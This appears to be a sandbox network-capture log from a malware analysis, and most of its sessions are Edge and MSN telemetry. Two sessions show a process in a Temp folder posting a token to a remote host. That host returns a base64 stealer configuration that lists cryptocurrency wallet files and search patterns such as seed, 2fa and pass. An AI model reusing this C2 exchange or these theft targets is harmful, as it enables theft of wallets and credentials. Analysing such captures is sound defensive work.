                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:13 UTC3822OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 31 36 3a 31 35 3a 31 31 2e 32 39 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 39 64 63 61 30 33 39 2d 38 34 37 38 2d 34 31 37 31 2d 62 36 33 34 2d 38 39 61 64 62 61 37 37 36 33 64 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 32 33 34 31 31 36 38 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-23T16:15:11.299Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"b9dca039-8478-4171-b634-89adba7763d2","epoch":"2234116809"},"app":{"locale
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:14 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=fdfba0ae671e488f98c6ad931ec123c4&HASH=fdfb&LV=202412&V=4&LU=1734970514020; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 16:15:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=1bdc9be1cb6b4a33811f812ae16aba27; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 16:45:14 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      time-delta-millis: 2716
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:14 GMT
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      40192.168.2.649977108.139.47.504437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:14 UTC1012OUTGET /b2?rn=1734970511307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=264DEDAF8CF36A9502DCF8F18D816BBC&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: UID=11521cea2404b69b6674da71734970511; XID=11521cea2404b69b6674da71734970511
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:14 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:14 GMT
                                                                                                                                                                                                                                                                                                      Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                      Via: 1.1 fa46ec88710e6374e08eeaa473342090.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: Brz9vQVc8JyaIBDfUnPEoCtSWmAk8RRZP94LYBefZuPqBg4uErCEcw==


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      41192.168.2.64998720.110.205.1194437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:14 UTC1261OUTGET /c.gif?rnd=1734970511306&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=07175bb318f0456c974d87721f0f67b4&activityId=07175bb318f0456c974d87721f0f67b4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=6E60CE8AF10C41EC8044A9E776F1DAF3&MUID=264DEDAF8CF36A9502DCF8F18D816BBC HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: c.msn.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:15 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                      P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                      Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                      Set-Cookie: MUID=264DEDAF8CF36A9502DCF8F18D816BBC; domain=.msn.com; expires=Sat, 17-Jan-2026 16:15:15 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                      Set-Cookie: SRM_M=264DEDAF8CF36A9502DCF8F18D816BBC; domain=c.msn.com; expires=Sat, 17-Jan-2026 16:15:15 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                      Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 30-Dec-2024 16:15:15 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                      Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 23-Dec-2024 16:25:15 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:14 GMT
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Content-Length: 42
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:15 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      42192.168.2.649994188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:15 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IW479RIW47G4E3W4EU37
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 57 34 37 39 52 49 57 34 37 47 34 45 33 57 34 45 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 49 57 34 37 39 52 49 57 34 37 47 34 45 33 57 34 45 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 49 57 34 37 39 52 49 57 34 37 47 34 45 33 57 34 45 55 33 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------IW479RIW47G4E3W4EU37Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------IW479RIW47G4E3W4EU37Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------IW479RIW47G4E3W4EU37Cont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:15 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:16 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      43192.168.2.650004188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:17 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EUSR9ZUKXLNYMY589HL6
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:17 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 55 53 52 39 5a 55 4b 58 4c 4e 59 4d 59 35 38 39 48 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 45 55 53 52 39 5a 55 4b 58 4c 4e 59 4d 59 35 38 39 48 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 45 55 53 52 39 5a 55 4b 58 4c 4e 59 4d 59 35 38 39 48 4c 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------EUSR9ZUKXLNYMY589HL6Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------EUSR9ZUKXLNYMY589HL6Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------EUSR9ZUKXLNYMY589HL6Cont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:18 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:18 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      44192.168.2.65000951.104.15.2534437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:19 UTC1071OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734970517172&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 11908
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:19 UTC11908OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 31 36 3a 31 35 3a 31 37 2e 31 37 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 39 64 63 61 30 33 39 2d 38 34 37 38 2d 34 31 37 31 2d 62 36 33 34 2d 38 39 61 64 62 61 37 37 36 33 64 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 32 33 34 31 31 36 38 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T16:15:17.170Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"b9dca039-8478-4171-b634-89adba7763d2","epoch":"2234116809"},"app":{"locale
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:20 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=072083bfeb5f48c38edf2818a6bd2e0c&HASH=0720&LV=202412&V=4&LU=1734970519532; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 16:15:19 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=db014e7c040449e9a2123a48881ff514; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 16:45:19 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                      time-delta-millis: 2360
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:19 GMT
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      45192.168.2.65000851.104.15.2534437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:19 UTC1070OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734970517176&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 5173
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:19 UTC5173OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 31 36 3a 31 35 3a 31 37 2e 31 37 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 39 64 63 61 30 33 39 2d 38 34 37 38 2d 34 31 37 31 2d 62 36 33 34 2d 38 39 61 64 62 61 37 37 36 33 64 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 32 33 34 31 31 36 38 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
